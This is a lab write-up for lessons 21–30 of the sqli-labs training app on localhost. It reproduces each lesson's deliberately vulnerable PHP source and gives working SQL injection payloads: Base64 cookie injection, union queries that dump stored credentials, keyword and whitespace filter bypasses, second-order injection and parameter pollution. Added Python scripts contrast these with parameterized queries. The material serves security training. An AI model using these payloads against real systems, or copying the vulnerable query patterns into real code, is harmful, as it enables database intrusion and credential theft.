SQLI-LAB hands-on notes (Less 21 - Less 30)
Source: Internet  Editor: 程序博客网  Time: 2024/05/22 01:42
- Less - 21 Cookie Injection- Error Based- complex - string
  - Test
  - Source Code
  - Solution
- Less - 22 Cookie Injection- Error Based- Double Quotes - string
  - Test
  - Source Code
  - Solution
- Less - 23 Error Based- no comments
  - Test
  - Source Code
  - Solution
- Less - 24 Second Degree Injections
  - Test
  - Source Code
  - Solution
- Less - 25 Trick with OR & AND
  - Test
  - Source Code
  - Solution
- Less - 25a Trick with OR & AND Blind
  - Test
  - Source Code
  - Solution
- Less - 26 Trick with comments
  - Test
  - Source Code
  - Solution
- Less - 26a Trick with comments
  - Test
  - Source Code
  - Solution
- Less - 27 Trick with SELECT & UNION
  - Test
  - Source Code
  - Solution
- Less - 27a Trick with SELECT & UNION
  - Test
  - Source Code
  - Solution
- Less - 28 Trick with SELECT & UNION
  - Test
  - Source Code
  - Solution
- Less - 28a Trick with SELECT & UNION
  - Test
  - Source Code
  - Solution
- Less - 29 Protection with WAF
  - Test
  - Source Code
  - Solution
- Less - 30 Protection with WAF
  - Test
  - Source Code
  - Solution
What follows is only the record I wrote while working through the sqli-lab exercises; it is for reference only.
Because I have already studied some SQL injection, most of it is not explained. If anything is unclear, please look it up with a search engine; I am confident you will find what you need.
Less - 21 Cookie Injection- Error Based- complex - string
Test:
http://localhost/sqli-lab/Less-21/index.php (POST body: uname=Dumb&passwd=Dumb&submit=Submit)
YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26
Note: RHVtYg== is Dumb after Base64 encoding (a value ending in one or two = signs is a hint to try Base64). Decoding it with an online Base64 encoder/decoder and re-encoding Dumb\ gives the next cookie value to try:
RHVtYlw=
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Dumb\') LIMIT 0,1' at line 1
Note: RHVtYlw= is the value of uname in the cookie; plaintext Dumb\
From this we can conclude that uname is wrapped in one layer of single quotes and one layer of parentheses.
Source Code:
Login part when no cookie is present:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if ($row1) {
    setcookie('uname', base64_encode($row1['username']), time()+3600);
    print_r(mysql_error());
    echo '<img src="../images/flag.jpg" />';
} else {
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';
}
Login part when a cookie is present:
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);
$sql = "SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result = mysql_query($sql);
if (!$result) {
    die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
    echo 'Your ID:' .$row['id'];
} else {
    echo '<img src="../images/slap1.jpg" />';
}
Solution:
Jykgb3IgMT0xICM=   (plaintext: ') or 1=1 #)
Others:
JykgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSw2IG9yIDE9MSAj   (plaintext: ') union select 1,database(),6 or 1=1 #)
JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=   (plaintext: ') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #)
JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSxncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMgICM=   (plaintext: ') union select 1,group_concat(username),group_concat(password) from security.users #)
Note: all of the above are values of uname in the cookie.
Less - 22 Cookie Injection- Error Based- Double Quotes - string
Test:
http://localhost/sqli-lab/Less-21/index.php (POST body: uname=Dumb&passwd=Dumb&submit=Submit), then cookie uname=RHVtYlw=
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"Dumb\" LIMIT 0,1' at line 1
Note: RHVtYlw= is the value of uname in the cookie; plaintext Dumb\
From this we can conclude that uname is wrapped in one layer of double quotes.
Source Code:
Login part when no cookie is present:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if ($row1) {
    setcookie('uname', base64_encode($row1['username']), time()+3600);
    print_r(mysql_error());
    echo '<img src="../images/flag.jpg" />';
} else {
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';
}
Login part when a cookie is present:
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql = "SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
$result = mysql_query($sql);
if (!$result) {
    die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
    echo 'Your ID:' .$row['id'];
} else {
    echo '<img src="../images/slap1.jpg" />';
}
Solution:
IiBvciAxPTEgIw==   (plaintext: " or 1=1 #)
Others:
IiB1bmlvbiBzZWxlY3QgMSxkYXRhYmFzZSgpLDYgb3IgMT0xICM=   (plaintext: " union select 1,database(),6 or 1=1 #)
IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==   (plaintext: " union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #)
IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodXNlcm5hbWUpLGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyAgIw==   (plaintext: " union select 1,group_concat(username),group_concat(password) from security.users #)
Note: all of the above are values of uname in the cookie.
Less - 23 Error Based- no comments
Test:
http://localhost/sqli-lab/Less-23/index.php?id=2'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1
Note: from this we can infer that $id is wrapped in single quotes.
Source Code:
// filter the comments out so that comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
} else {
    print_r(mysql_error());
}
Solution:
' or '1' = '
http://localhost/sqli-lab/Less-23/index.php?id=' or '1' = '
Others:
http://localhost/sqli-lab/Less-23/index.php?id=' union select 1,version(),3 or '1' = '
http://localhost/sqli-lab/Less-23/index.php?id=' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '
Less - 24 Second Degree Injections
Test:
http://localhost/sqli-lab/Less-24/index.php (POST body: username=wolf, password=1111)
Note: sqli-lab was written quite a while ago and targets an equally old PHP version (probably 5.2); some of the functions it uses have since been removed, so they need to be replaced with their modern equivalents.
Source Code:
login_create.php:
$link = mysqli_connect('localhost', 'root', '', 'security');
$username = mysqli_real_escape_string($link, $_POST['username']);
$pass = mysqli_real_escape_string($link, $_POST['password']);
$re_pass = mysqli_real_escape_string($link, $_POST['re_password']);
$sql = "insert into users (username, password) values(\"$username\", \"$pass\")";
login.php:
$link = mysqli_connect('localhost', 'root', '', 'security');
$username = mysqli_real_escape_string($link, $_POST["login_user"]);
$password = mysqli_real_escape_string($link, $_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
Solution:
Register with username=admin" # and password=1111, then reset the password from 1111 to anything (e.g. 666); logging in with username=admin and password=666 then works.
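Less 24 shows why escaping at registration does not protect a later query that re-uses the stored string. As an added example (not the lab's code), the Python script below replays that flow on an in-memory SQLite table: `register` stores the raw name intact, exactly as the escaped MySQL insert does, and a password-change query then interpolates the session username. The password-change query shape is an assumption (the page does not show pass_change.php), and SQLite's quote and comment syntax (`'` and `--`) stands in for the MySQL `"` and `#` of the page's payload.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's security.users table.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'original')")
    db.commit()
    return db

def register(db, username, password):
    # login_create.php escapes the input before the INSERT; binding has the same
    # effect here: the string is stored exactly as typed, quote characters included.
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))
    db.commit()

def change_password_vulnerable(db, session_username, current, new):
    # Assumed shape of the password-change query: the username is read back from the
    # session (it was "escaped" at registration, so it looks trusted) and interpolated.
    sql = (f"UPDATE users SET password='{new}' "
           f"WHERE username='{session_username}' AND password='{current}'")
    db.execute(sql)
    db.commit()
    return sql

def change_password_safe(db, session_username, current, new):
    # Same logic with every value bound: whatever the stored name contains, it can
    # only ever be compared against the column, never parsed as SQL.
    db.execute("UPDATE users SET password=? WHERE username=? AND password=?",
               (new, session_username, current))
    db.commit()

def password_of(db, username):
    row = db.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None

# SQLite spelling of the page's admin" # registration name (constructed): the quote
# closes the username literal and "-- " comments out the password check.
SECOND_ORDER_NAME = "admin'-- "

def run(safe):
    """Register the crafted name, change its own password, report both passwords."""
    db = make_db()
    register(db, SECOND_ORDER_NAME, "1111")
    change = change_password_safe if safe else change_password_vulnerable
    change(db, SECOND_ORDER_NAME, "1111", "666")
    return password_of(db, "admin"), password_of(db, SECOND_ORDER_NAME)

if __name__ == "__main__":
    print("interpolated :", run(safe=False))   # admin's password was overwritten
    print("parameterized:", run(safe=True))    # only the registrant's own row changed
```

The interpolated version changes admin's password even though no request ever contained unescaped input; the bound version touches only the row that actually matches.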
Less - 25 Trick with OR & AND
Test:
http://localhost/sqli-lab/Less-25/index.php?id=1' #
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes.
http://localhost/sqli-lab/Less-25/index.php?id=1' --+
Note: no error.
Source Code:
function blacklist($id) {
    $id = preg_replace('/or/i', "", $id);
    $id = preg_replace('/AND/i', "", $id);
    return $id;
}
$id = blacklist($id);
$hint = $id;
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
} else {
    print_r(mysql_error());
}
Note: and and or are filtered out, errors are displayed, and $id is wrapped in single quotes.
Solution:
http://localhost/sqli-lab/Less-25/index.php?id=0' oorr 1=1 --+
http://localhost/sqli-lab/Less-25/index.php?id=2' aandnd 1=1 --+
Others:
http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,version(),database()--+
http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+
Note: and and or are filtered, but only once, so doubling them up is enough.
Less - 25a Trick with OR & AND Blind
Test:
http://localhost/sqli-lab/Less-25a/index.php?id=1
http://localhost/sqli-lab/Less-25a/index.php?id=2'
http://localhost/sqli-lab/Less-25a/index.php?id=2"
http://localhost/sqli-lab/Less-25a/index.php?id=2 oorr 1=1 #
Note: there is no quoting around id; or and and are filtered.
Source Code:
function blacklist($id) {
    $id = preg_replace('/or/i', "", $id);
    $id = preg_replace('/AND/i', "", $id);
    return $id;
}
$id = blacklist($id);
$hint = $id;
$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
} else {
}
Note: and and or are filtered out; no error is displayed.
Solution:
http://localhost/sqli-lab/Less-25a/index.php?id=0 oorr 1=1 --+
http://localhost/sqli-lab/Less-25a/index.php?id=2 aandnd 1=1 --+
Others:
http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,version(),database() --+
http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+
Less - 26 Trick with comments
Test:
http://localhost/sqli-lab/Less-26/index.php?id=0'")And AND and or OR select union /// #--/*+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '")selectunion' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes only; after filtering, all that is left is ")selectunion
Source Code:
function blacklist($id) {
    $id = preg_replace('/or/i', "", $id);          //strip out OR (non case sensitive)
    $id = preg_replace('/and/i', "", $id);         //Strip out AND (non case sensitive)
    $id = preg_replace('/[\/\*]/', "", $id);       //strip out /*
    $id = preg_replace('/[--]/', "", $id);         //Strip out --
    $id = preg_replace('/[#]/', "", $id);          //Strip out #
    $id = preg_replace('/[\s]/', "", $id);         //Strip out spaces
    $id = preg_replace('/[\/\\\\]/', "", $id);     //Strip out slashes
    return $id;
}
$id = blacklist($id);
$hint = $id;
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
} else {
    print_r(mysql_error());
}
Note: $id is wrapped in single quotes; or, and, /*, --, #, whitespace and / are filtered out.
Solution:
http://localhost/sqli-lab/Less-26/index.php?id=1'%26%26'1
Others:
http://localhost/sqli-lab/Less-26/index.php?id=0'%A0UNION%A0SELECT%A01,version(),database()%26%26%a0'1
http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0'1
http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0'1
Note: %A0 is used in place of the space and && (%26%26) in place of AND.
Less - 26a Trick with comments
Test:
http://localhost/sqli-lab/Less-26a/index.php?id=1')")And AND and or OR select union /// #--/*+
Note: after filtering only ')")selectunion is left; no SQL query error is shown.
http://localhost/sqli-lab/Less-26a/index.php?id=1'%A0%26%26%A0 '1'='1
http://localhost/sqli-lab/Less-26a/index.php?id=1"%A0%26%26%A0 "1"="1
http://localhost/sqli-lab/Less-26a/index.php?id=1")%A0%26%26%A0 ("1")=("1
Note: none of these errors, so the query format is still unknown.
http://localhost/sqli-lab/Less-26a/index.php?id=0'%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0'1
Note: PHP errors appear; the format is probably wrong and the query returns nothing.
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1
Note: this one is right.
Source Code:
function blacklist($id) {
    $id = preg_replace('/or/i', "", $id);          //strip out OR (non case sensitive)
    $id = preg_replace('/and/i', "", $id);         //Strip out AND (non case sensitive)
    $id = preg_replace('/[\/\*]/', "", $id);       //strip out /*
    $id = preg_replace('/[--]/', "", $id);         //Strip out --
    $id = preg_replace('/[#]/', "", $id);          //Strip out #
    $id = preg_replace('/[\s]/', "", $id);         //Strip out spaces
    $id = preg_replace('/[\s]/', "", $id);         //Strip out spaces
    $id = preg_replace('/[\/\\\\]/', "", $id);     //Strip out slashes
    return $id;
}
$id = blacklist($id);
$hint = $id;
$sql = "SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
} else {
}
Note: $id is wrapped in single quotes and parentheses; or, and, /*, --, #, whitespace and / are filtered out.
Solution:
http://localhost/sqli-lab/Less-26a/index.php?id=1')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1
Others:
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,version(),database()%26%26%a0('1
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0('1
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0('1
Less - 27 Trick with SELECT & UNION
Test:
http://localhost/sqli-lab/Less-27/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '")AndANDandorOROror' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes; union, select and the characters that act as comments are filtered out.
Source Code:
function blacklist($id) {
    $id = preg_replace('/[\/\*]/', "", $id);    //strip out /*
    $id = preg_replace('/[--]/', "", $id);      //Strip out --.
    $id = preg_replace('/[#]/', "", $id);       //Strip out #.
    $id = preg_replace('/[ +]/', "", $id);      //Strip out spaces.
    $id = preg_replace('/select/m', "", $id);   //Strip out select.
    $id = preg_replace('/[ +]/', "", $id);      //Strip out spaces.
    $id = preg_replace('/union/s', "", $id);    //Strip out union
    $id = preg_replace('/select/s', "", $id);   //Strip out select
    $id = preg_replace('/UNION/s', "", $id);    //Strip out UNION
    $id = preg_replace('/SELECT/s', "", $id);   //Strip out SELECT
    $id = preg_replace('/Union/s', "", $id);    //Strip out Union
    $id = preg_replace('/Select/s', "", $id);   //Strip out Select
    return $id;
}
$id = blacklist($id);
$hint = $id;
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
} else {
    print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0or(1)=(1)%26%26%a0'1
Others:
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0'1
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0'1
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0'1
Less - 27a Trick with SELECT & UNION
Test:
http://localhost/sqli-lab/Less-27a/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+
Note: no SQL query error is shown; after filtering, 0'")AndANDandorOROror is left.
Source Code:
function blacklist($id) {
    $id = preg_replace('/[\/\*]/', "", $id);    //strip out /*
    $id = preg_replace('/[--]/', "", $id);      //Strip out --.
    $id = preg_replace('/[#]/', "", $id);       //Strip out #.
    $id = preg_replace('/[ +]/', "", $id);      //Strip out spaces.
    $id = preg_replace('/select/m', "", $id);   //Strip out select.
    $id = preg_replace('/[ +]/', "", $id);      //Strip out spaces.
    $id = preg_replace('/union/s', "", $id);    //Strip out union
    $id = preg_replace('/select/s', "", $id);   //Strip out select
    $id = preg_replace('/UNION/s', "", $id);    //Strip out UNION
    $id = preg_replace('/SELECT/s', "", $id);   //Strip out SELECT
    $id = preg_replace('/Union/s', "", $id);    //Strip out Union
    $id = preg_replace('/Select/s', "", $id);   //Strip out Select
    return $id;
}
$id = blacklist($id);
$hint = $id;
$id = '"' .$id. '"';
$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
} else {
}
Solution:
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0or(1)=(1)%26%26%a0"1
Others:
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0"1
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0"1
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1
Less - 28 Trick with SELECT & UNION
Test:
http://localhost/sqli-lab/Less-28/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select /// #--?/*+
Note: the combination union<space>select is filtered, as are all spaces; no SQL query error is shown.
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect
Note: in UnIon%A0SeLect the separator is no longer a space, so it is not filtered.
http://localhost/sqli-lab/Less-28/index.php?id=0'%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0'
Note: PHP error.
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('
Note: this one is right, which shows that id is wrapped in single quotes and parentheses.
Source Code:
function blacklist($id) {
    $id = preg_replace('/[\/\*]/', "", $id);              //strip out /*
    $id = preg_replace('/[--]/', "", $id);                //Strip out --.
    $id = preg_replace('/[#]/', "", $id);                 //Strip out #.
    $id = preg_replace('/[ +]/', "", $id);                //Strip out spaces.
    $id = preg_replace('/[ +]/', "", $id);                //Strip out spaces.
    $id = preg_replace('/union\s+select/i', "", $id);    //Strip out UNION & SELECT.
    return $id;
}
$id = blacklist($id);
$hint = $id;
$sql = "SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
} else {
}
Solution:
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('
Others:
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0('1
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0('1
Less - 28a Trick with SELECT & UNION
Test:
http://localhost/sqli-lab/Less-28a/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select /// #--?/*+
Note: only the combination union<space>select is filtered; no SQL query error is shown.
http://localhost/sqli-lab/Less-28a/index.php?id=1') --
Note: displays normally; spaces and the characters that act as comments are not filtered.
Source Code:
function blacklist($id) {
    $id = preg_replace('/union\s+select/i', "", $id);
    return $id;
}
$id = blacklist($id);
$hint = $id;
$sql = "SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
} else {
}
Solution:
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,2,3--+
Others:
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,version(),database()--+
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(username),group_concat(password) from security.users where 1--+
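The filters of Less 23 and Less 25 through 28a share one weakness: each removes a blacklist of substrings once and then trusts whatever is left. As an added example (not the lab's own code), the Python script below runs the page's own inputs through ports of the Less 23, 25, 26 and 28a `blacklist()` functions, a fixed-point variant that re-applies a filter until nothing changes, and an allowlist check; `re.ASCII` is used so that `\s` behaves like PCRE without the `u` modifier in the C locale and does not match the 0xA0 byte.

```python
import re
from urllib.parse import unquote

# Ports of the page's blacklist() filters for Less 23, 25, 26 and 28a (added example).
# re.ASCII mirrors PCRE without /u: \s matches only ASCII whitespace, never 0xA0.
def filter_less23(s):
    return s.replace("#", "").replace("--", "")

def filter_less25(s):
    # One pass per keyword: removing the inner "or" of "oorr" leaves a new "or" behind.
    s = re.sub(r"or", "", s, flags=re.I)
    return re.sub(r"and", "", s, flags=re.I)

def filter_less26(s):
    s = filter_less25(s)
    for pat in (r"[/*]", r"[-]", r"[#]", r"\s", r"[/\\]"):   # same classes as the page
        s = re.sub(pat, "", s, flags=re.ASCII)
    return s

def filter_less28a(s):
    return re.sub(r"union\s+select", "", s, flags=re.I | re.ASCII)

def filter_fixpoint(s, f):
    # Re-apply a filter until it stops changing the input. This closes the "oorr" hole
    # of Less 25 but does nothing against substitutes such as %A0 for space or && for AND.
    while True:
        t = f(s)
        if t == s:
            return s
        s = t

def allowlist_id(s):
    # The robust check: accept only what the column needs (a decimal integer) and bind
    # that. re.fullmatch also avoids "$" matching before a trailing newline.
    return int(s) if re.fullmatch(r"\d+", s, flags=re.ASCII) else None

def decode(fragment):
    # The server sees %A0 and %26 as raw bytes; latin-1 keeps each one a single character.
    return unquote(fragment, encoding="latin-1")

# Constructed inputs, taken from the page's own solutions for each lesson.
LESS23 = "' or '1' = '"
LESS25 = "0' oorr 1=1 --+"
LESS26 = decode("0'%A0UNION%A0SELECT%A01,2,3%26%26%a0'1")
LESS28A = decode("0') UnIon%A0SeLect 1,2,3--+")

def survivors():
    """What each filter actually hands on to the SQL string for the page's inputs."""
    return {
        "less23": filter_less23(LESS23),
        "less25": filter_less25(LESS25),
        "less25_fixpoint": filter_fixpoint(LESS25, filter_less25),
        "less26": filter_less26(LESS26),
        "less26_fixpoint": filter_fixpoint(LESS26, filter_less26),
        "less28a": filter_less28a(LESS28A),
    }

if __name__ == "__main__":
    for name, out in survivors().items():
        print(f"{name:16} -> {out!r}")
    print("allowlist:", [allowlist_id(v) for v in (LESS23, LESS25, LESS26, LESS28A, "1")])
```

Only the Less 25 input is changed by iterating the filter; the Less 26 and 28a inputs pass every blacklist untouched, while the allowlist rejects all four and accepts only a plain integer.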
Less - 29 Protection with WAF
Test:
http://localhost/sqli-lab/Less-29/login.php?id=0' union select 1,2,3 --+
Note: the request is detected as malicious and redirected to another page.
Source Code:
login.php:
// WAF implementation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
    $match = preg_match("/^\d+$/", $input);
    if ($match) {
    } else {
        header('Location: hacked.php');
    }
}
// The function below imitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
    $q_s = $query_string;
    $qs_array = explode("&", $q_s);
    foreach ($qs_array as $key => $value) {
        $val = substr($value, 0, 2);
        if ($val == "id") {
            $id_value = substr($value, 3, 30);
            return $id_value;
            echo "<br>";
            break;
        }
    }
}
$qs = $_SERVER['QUERY_STRING'];
$hint = $qs;
$id1 = java_implimentation($qs);
$id = $_GET['id'];
whitelist($id1);
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
} else {
    print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,2,3 --+
Others:
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,version(),database() --+
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
Less - 30 Protection with WAF
Test:
http://localhost/sqli-lab/Less-30/login.php?id=1&id=6
Note: the record with id 6 is displayed.
Source Code:
$qs = $_SERVER['QUERY_STRING'];
$hint = $qs;
$id1 = java_implimentation($qs);
$id = $_GET['id'];
whitelist($id1);
$id = '"' .$id. '"';
$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
} else {
    print_r(mysql_error());
}
// WAF implementation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
    $match = preg_match("/^\d+$/", $input);
    if ($match) {
    } else {
        header('Location: hacked.php');
    }
}
// The function below imitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
    $q_s = $query_string;
    $qs_array = explode("&", $q_s);
